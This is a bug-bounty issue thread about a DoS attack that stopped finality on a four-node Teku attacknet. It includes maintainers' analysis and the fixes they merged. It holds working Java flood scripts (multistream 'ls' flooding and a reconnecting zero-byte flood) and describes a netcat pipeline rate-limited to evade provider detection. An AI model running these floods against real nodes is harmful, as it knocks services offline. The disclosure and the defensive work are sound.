jrhea closed this issue 3 years ago
Very interesting, finality could break easily on eth 2.0 😂
I'm confident that the Teku team will be able to fix this particular issue. Keep in mind that this was a 4 node network so taking two nodes down took much less effort and coordination than a 1000+ node production mainnet.
Why not :) https://cointelegraph.com/news/ethereum-network-overcame-intentional-attack-affecting-parity-nodes
Not impossible...just saying it's not necessarily going to be as easy as this. 🙂
Apologies, I should have been posting updates here on progress to address this. The multistream protocol has a length prefix for each message. Since the attack traffic is a stream of 0s, each byte winds up being interpreted as a separate zero-length message. The messages are all invalid, as they should end with `\n` and don't match any supported protocols, so they all wind up being rejected, with jvm-libp2p responding to each byte with a `na\n` response.
However, that causes a couple of issues. Firstly, responding to one byte with multiple bytes is a vector for various amplification attacks, but that wasn't the issue that caused the loss of finality. The second issue is that the `na\n` responses were being written faster than they were read by the attacking peer, and jvm-libp2p was not applying any throttling. Eventually TCP back pressure kicked in, filling up the OS write buffers, and the responses wound up being queued in user-space memory. This pushed both on-heap and off-heap memory usage up very substantially. CPU also spiked significantly, partly due to processing all those multistream "messages" but mostly because of the resultant memory pressure and GC activity.
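To make the framing issue concrete, here is a small standalone sketch (not Teku or jvm-libp2p code; it simplifies multistream's unsigned varint length prefix to a single byte) showing why every 0x00 byte parses as its own invalid, zero-length message:

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

public class ZeroFramingDemo {
  public static void main(String[] args) throws IOException {
    // Eight 0x00 bytes, as produced by /dev/zero.
    final InputStream in = new ByteArrayInputStream(new byte[8]);
    int messages = 0;
    int length;
    // Multistream messages are <length prefix><payload ending in '\n'>.
    while ((length = in.read()) != -1) {
      final byte[] payload = in.readNBytes(length);
      final boolean valid = length > 0 && payload[length - 1] == '\n';
      messages++;
      System.out.printf("message %d: length=%d, valid=%b -> reply \"na\\n\"%n",
          messages, length, valid);
    }
    // Each single attack byte produced one invalid message and a 3-byte
    // "na\n" reply: a built-in amplification vector.
    System.out.println(messages + " invalid messages from 8 attack bytes");
  }
}
```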
Preventing this specific attack is straightforward: disconnect the peer immediately when an invalid (e.g. zero-length) multistream message is received. https://github.com/libp2p/jvm-libp2p/pull/126 implements that for jvm-libp2p. The jvm-libp2p update hasn't been pulled into Teku yet as there are still more fixes required.
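For illustration only (the actual fix is in the jvm-libp2p PR above; the class and framing handling here are made up and simplified), the shape of the mitigation is a Netty handler that closes the connection instead of answering invalid frames:

```java
import io.netty.buffer.ByteBuf;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.SimpleChannelInboundHandler;

public class InvalidMultistreamDisconnectHandler extends SimpleChannelInboundHandler<ByteBuf> {

  @Override
  protected void channelRead0(final ChannelHandlerContext ctx, final ByteBuf msg) {
    // Simplified: treat the first readable byte as the message's length prefix.
    final int length =
        msg.readableBytes() > 0 ? msg.getUnsignedByte(msg.readerIndex()) : -1;
    if (length <= 0) {
      // A zero-length (or empty) message can never be a valid protocol id.
      // Disconnect immediately rather than replying "na\n" byte after byte.
      ctx.close();
      return;
    }
    // Pass plausible frames up the pipeline for real multistream handling.
    ctx.fireChannelRead(msg.retain());
  }
}
```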
Specifically, it's possible to trigger this attack using valid multistream messages, and to do so even more efficiently by not reading the input stream at all while attacking. For example:
```java
import java.io.IOException;
import java.io.OutputStream;
import java.net.Socket;
import java.nio.charset.StandardCharsets;

import org.apache.tuweni.bytes.Bytes; // assumed: Apache Tuweni's Bytes

public class MultistreamFlood {

  public static void main(String[] args) throws Exception {
    final String host = "127.0.0.1";
    final int port = 4002;
    try (final Socket socket = new Socket(host, port);
        final OutputStream out = socket.getOutputStream()) {
      // Complete the multistream handshake with a valid protocol header...
      send(out, "/multistream/1.0.0");
      // ...then flood valid "ls" requests without ever reading the responses.
      while (true) {
        send(out, "ls");
      }
    }
  }

  private static void send(final OutputStream out, final String cmd) throws IOException {
    out.write(getCommandBytes(cmd + "\n"));
    out.flush();
  }

  // Multistream messages are a length prefix followed by the payload.
  private static byte[] getCommandBytes(final String s) {
    final byte[] noise = s.getBytes(StandardCharsets.UTF_8);
    return Bytes.wrap(Bytes.of((byte) noise.length), Bytes.wrap(noise)).toArray();
  }
}
```
This turns out to be much more efficient than the original attack. This is a surprisingly common problem with Netty, which jvm-libp2p uses internally, due to the particular details of its async IO model. A few more changes and further investigation are needed to ensure that the higher-level req/resp responses aren't negatively affected, but an initial start on fixing this category of vulnerability is https://github.com/PegaSysEng/teku/pull/2478/. There, Netty's user-space write buffers are significantly reduced and inputs are no longer read until existing output can be written. Additionally, connections are disconnected when the write buffer remains full for too long. With these changes the multistream-level attack is very effectively mitigated.
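Sketched below is the general pattern just described, with illustrative names and values rather than the actual code from that PR: shrink the user-space write buffer, stop reading from a peer while the channel is unwritable, and schedule a disconnect if it stays that way for too long.

```java
import java.util.concurrent.TimeUnit;

import io.netty.channel.Channel;
import io.netty.channel.ChannelHandlerContext;
import io.netty.channel.ChannelInboundHandlerAdapter;
import io.netty.channel.ChannelOption;
import io.netty.channel.WriteBufferWaterMark;
import io.netty.util.concurrent.ScheduledFuture;

public class WriteBackpressureHandler extends ChannelInboundHandlerAdapter {
  private static final long UNWRITABLE_LIMIT_MS = 5_000; // illustrative value
  private ScheduledFuture<?> disconnectTask;

  public static void configure(final Channel channel) {
    // Keep only a small amount of outbound data queued in user space before
    // Netty flags the channel unwritable (sizes here are illustrative).
    channel.config().setOption(
        ChannelOption.WRITE_BUFFER_WATER_MARK,
        new WriteBufferWaterMark(1024, 8 * 1024));
  }

  @Override
  public void channelWritabilityChanged(final ChannelHandlerContext ctx) {
    final boolean writable = ctx.channel().isWritable();
    // Don't read more input from this peer until our queued output drains,
    // letting TCP back pressure reach the sender instead of heap memory.
    ctx.channel().config().setAutoRead(writable);
    if (!writable && disconnectTask == null) {
      // If the peer won't read what we owe it, drop the connection.
      disconnectTask =
          ctx.executor().schedule(ctx::close, UNWRITABLE_LIMIT_MS, TimeUnit.MILLISECONDS);
    } else if (writable && disconnectTask != null) {
      disconnectTask.cancel(false);
      disconnectTask = null;
    }
    ctx.fireChannelWritabilityChanged();
  }
}
```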
We are continuing to work our way through the whole stack checking for similar points of vulnerability and any potential unintended side-effects of the write buffer tunings.
Given we are in a phase of testing and development, without a production beacon chain deployed, we're focusing on a slow and steady approach to work through not just this issue but as many issues in the same or similar categories as we can.
Plausible liveness doesn’t work in ETH 2.0
@astrixial I'm not sure your comment really aligns with what this issue is about. In any consensus algorithm if all the nodes are shut down it will not finalise anything. We're currently in a phase of improving the robustness of clients against deliberate attacks to take them offline and doing so with a network containing only 4 nodes (all running the same software). Resilience to DOS attacks increases significantly as you increase the number of nodes and diversity of clients, locations and network connections (and also as you harden individual clients against attacks which we're also doing).
Great work @jrhea! This qualifies for the $5k beta-0 teku attacknet bounty!
Thank you @ajsutton for your work in diagnosing and fixing the vector :)
The fix for this attack and my more efficient version have now been merged into Teku. We've also throttled the responses we send for libp2p req/resp requests to avoid queuing too much data, so that we only load and send the next block after the first has been successfully written to the OS write buffer.
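The throttling pattern is roughly the following (a sketch with assumed names, not Teku's actual req/resp code): write one response, and only fetch and write the next once Netty reports the previous write has completed.

```java
import java.util.Iterator;

import io.netty.channel.Channel;

public final class ThrottledBlockSender {

  // `blocks` is a lazy iterator, so a block is only loaded when requested.
  public static void sendBlocks(final Channel channel, final Iterator<?> blocks) {
    if (!blocks.hasNext()) {
      return;
    }
    channel.writeAndFlush(blocks.next()).addListener(future -> {
      if (future.isSuccess()) {
        // Only load and send the next block once this one has been handed
        // off to the OS write buffer.
        sendBlocks(channel, blocks);
      } else {
        // Assumed policy: give up on the peer if a write fails.
        channel.close();
      }
    });
  }
}
```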
@ajsutton https://github.com/PegaSysEng/teku/pull/2486 this is the fix right? could you perhaps confirm that @jrhea's exploit doesn't work on latest Teku master?
@gakonst https://github.com/PegaSysEng/teku/pull/2478 is the most critical piece to prevent the write buffer growing out of control. There's also a fix in jvm-libp2p to disconnect on invalid messages: https://github.com/libp2p/jvm-libp2p/pull/126
The PR you mention is a follow-up which I'm not sure was strictly necessary to avoid DOS attacks, but it does make it less likely that an honest peer on a slow connection gets disconnected just because we can write blocks faster than they can read them.
@jrhea's exploit and the variants of it that I identified do not work on latest Teku master.
Description
Teku nodes are vulnerable to a simple DoS attack that prevents them from participating in consensus.
Attack scenario
Two of four Teku nodes were targeted by five ordinary machines with a sustained DoS attack. Initial loss of finality was achieved with two or three machines, but the others joined within a few epochs to ensure that the network could not recover.
Impact
The DoS attack caused a prolonged loss of finality on the attacknet, and manual intervention was required to restore the network to a healthy state once the attack stopped. The nodes under attack used large amounts of memory, were subject to multiple container restarts, had trouble staying connected to peers, and one node's local clock was 20 minutes slow.
Details
How the attack was implemented
This is the command that the five machines ran to prevent finality on the attacknet:
The command pipes `0x00` bytes from `/dev/zero` into the `pv` command, which rate-limits the stream to a (somewhat arbitrary) value high enough to prevent finality but low enough to stay off AWS/ISP radars so the attack can continue. The data is then piped into the `netcat` command, which sends it to the nodes under attack. The `while` loop is there to restart the command when it loses connectivity and exits due to container restarts.

Here is a snippet of the output from one of the machines attacking the network:
You can see the attacking machine lose connection to the node as it restarts - this is when the while loop kicks in and keeps trying to reconnect.
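For reference, here is a rough Java equivalent of that shell pipeline (a sketch only: the host, port, and rate limit below are placeholders, not the values used in the actual attack):

```java
import java.io.OutputStream;
import java.net.Socket;

public class ZeroFlood {
  public static void main(String[] args) {
    final String host = "127.0.0.1"; // placeholder target
    final int port = 9000;           // placeholder TCP port
    final byte[] zeros = new byte[64 * 1024]; // one 64 KiB chunk of 0x00
    final int chunksPerSecond = 16;  // arbitrary rate limit, like pv's
    while (true) { // the while loop: reconnect whenever the node drops us
      try (final Socket socket = new Socket(host, port);
          final OutputStream out = socket.getOutputStream()) {
        while (true) { // /dev/zero | pv: a rate-limited stream of 0x00 bytes
          out.write(zeros);
          out.flush();
          Thread.sleep(1000 / chunksPerSecond);
        }
      } catch (final Exception e) {
        // Connection lost (e.g. the container restarted); loop and retry.
      }
    }
  }
}
```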
Attack log
Epoch 407, Slot 13038
This is the first time the network missed a block. At this point, I was still tweaking the command parameters and working out how to keep the attack going in the event that the TCP connection fails. Here is the output from a node I had monitoring the network:
Epoch 413
Two AWS t2.small machines begin the DoS attack on 13.114.37.176 and 35.175.180.94. You can see the peer count begin to drop and several skipped slots.

Epoch 414
This is the first time the chain fails to finalize, and there are now three machines attacking the network: two t2.smalls and one MacBook.
Epoch 416 - 417
I added a second MacBook Pro to the attack in epoch 416, and by the end of epoch 417 (15:59 specifically) there were a total of five machines participating: two t2.smalls and three MacBooks.
Epoch 420
The network manages to justify epoch 417 (up from 412), but finality is still prevented.
Epoch 428, Slot 13700
Finality is prevented for the required 16 epochs and the attack officially stops after slot 13700.
Epoch 433
The network hasn't been attacked for several epochs and manages to recover enough to justify epoch 430.
Epoch 444 - 445
The network finally recovers and finality is restored.